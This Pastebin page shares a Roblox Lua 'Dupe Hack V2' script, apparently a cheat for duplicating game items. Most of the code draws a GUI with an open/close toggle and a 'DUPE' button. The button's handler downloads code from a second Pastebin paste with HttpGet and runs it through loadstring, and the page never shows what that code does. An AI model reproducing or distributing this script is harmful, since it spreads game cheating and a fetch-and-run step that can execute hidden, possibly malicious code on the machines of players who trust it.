Advertisement
Not_ThePastebin-Hack

Dupe From Bear

Mar 23rd, 2022
16
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.50 KB | None | 0 0
  1. -- Dupe Script
  2. -- Version: 2.0
  3.  
  4. -- Instances:
  5.  
  6. local Dupe = Instance.new("ScreenGui")
  7. local OpenClose = Instance.new("TextButton")
  8. local Frame = Instance.new("Frame")
  9. local Frame_2 = Instance.new("Frame")
  10. local Button = Instance.new("TextButton")
  11. local TextLabel = Instance.new("TextLabel")
  12.  
  13. --Properties:
  14.  
  15. Dupe.Name = "Dupe"
  16. Dupe.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
  17.  
  18. OpenClose.Name = "Open/Close"
  19. OpenClose.Parent = Dupe
  20. OpenClose.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  21. OpenClose.BorderSizePixel = 0
  22. OpenClose.Position = UDim2.new(0.00458727032, 0, 0.694266319, 0)
  23. OpenClose.Size = UDim2.new(0, 99, 0, 41)
  24. OpenClose.Style = Enum.ButtonStyle.RobloxButton
  25. OpenClose.Font = Enum.Font.SourceSansSemibold
  26. OpenClose.Text = "Close"
  27. OpenClose.TextColor3 = Color3.fromRGB(255, 255, 255)
  28. OpenClose.TextScaled = true
  29. OpenClose.TextSize = 20.000
  30. OpenClose.TextWrapped = true
  31.  
  32. Frame.Parent = Dupe
  33. Frame.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
  34. Frame.BackgroundTransparency = 0.500
  35. Frame.BorderColor3 = Color3.fromRGB(11, 74, 247)
  36. Frame.BorderSizePixel = 2
  37. Frame.Position = UDim2.new(0.488505214, -100, 0.538340509, -100)
  38. Frame.Size = UDim2.new(0, 261, 0, 148)
  39.  
  40. Frame_2.Parent = Frame
  41. Frame_2.BackgroundColor3 = Color3.fromRGB(0, 85, 255)
  42. Frame_2.BorderColor3 = Color3.fromRGB(0, 85, 255)
  43. Frame_2.Position = UDim2.new(0.261675835, 0, 0.50772202, 0)
  44. Frame_2.Size = UDim2.new(0, 123, 0, 49)
  45. Frame_2.Style = Enum.FrameStyle.RobloxRound
  46.  
  47. Button.Name = "Button"
  48. Button.Parent = Frame
  49. Button.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  50. Button.BackgroundTransparency = 1.000
  51. Button.Position = UDim2.new(0.261675835, 0, 0.51074487, 0)
  52. Button.Size = UDim2.new(0, 123, 0, 50)
  53. Button.Font = Enum.Font.SourceSansBold
  54. Button.Text = "DUPE"
  55. Button.TextColor3 = Color3.fromRGB(64, 255, 102)
  56. Button.TextSize = 36.000
  57.  
  58. TextLabel.Parent = Frame
  59. TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  60. TextLabel.BackgroundTransparency = 1.000
  61. TextLabel.BorderColor3 = Color3.fromRGB(255, 0, 0)
  62. TextLabel.BorderSizePixel = 0
  63. TextLabel.Position = UDim2.new(0.0600733757, 0, -0.00439617783, 0)
  64. TextLabel.Size = UDim2.new(0, 229, 0, 61)
  65. TextLabel.Font = Enum.Font.SourceSansBold
  66. TextLabel.Text = "Dupe Hack V2"
  67. TextLabel.TextColor3 = Color3.fromRGB(0, 85, 255)
  68. TextLabel.TextSize = 40.000
  69. TextLabel.TextStrokeColor3 = Color3.fromRGB(0, 170, 255)
  70.  
  71. -- Scripts:
  72.  
  73. local function DupeScript() -- Dupe.Script
  74. local script = Instance.new('Script', Dupe)
  75.  
  76. --Azarth Open/Close GUI TUT
  77.  
  78.  
  79. local branch = script.Parent --Variable points to ScreenGui & everthing inside/below it.
  80. local open = branch["Open/Close"] --Variable points to the open/close button.
  81. local MainFrame = branch.Frame --Variable points to "Frame".
  82.  
  83. open.MouseButton1Click:connect(function() --Anonymous function that is wired to the open/close button.
  84. if MainFrame.Visible == false then --If Frame isn't Visible then
  85. MainFrame.Visible = true --frame becomes visible
  86. open.Text = "Close" --text changes to close
  87. elseif --elseif -->
  88. MainFrame.Visible == true then --frame is visibe then
  89. MainFrame.Visible = false --frame.Visible = false
  90. open.Text = "Open" --text changes to open
  91. end
  92. end)
  93.  
  94.  
  95. end
  96. coroutine.wrap(DupeScript)()
  97. local function DupeScript() -- Button.Script
  98. local script = Instance.new('Script', Button)
  99.  
  100. Button.MouseButton1Down:connect(function()
  101. loadstring(game:HttpGet("https://pastebin.com/raw/zenB7fxV"))()
  102. end)
  103. end
  104. coroutine.wrap(DupeScript)()
  105.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement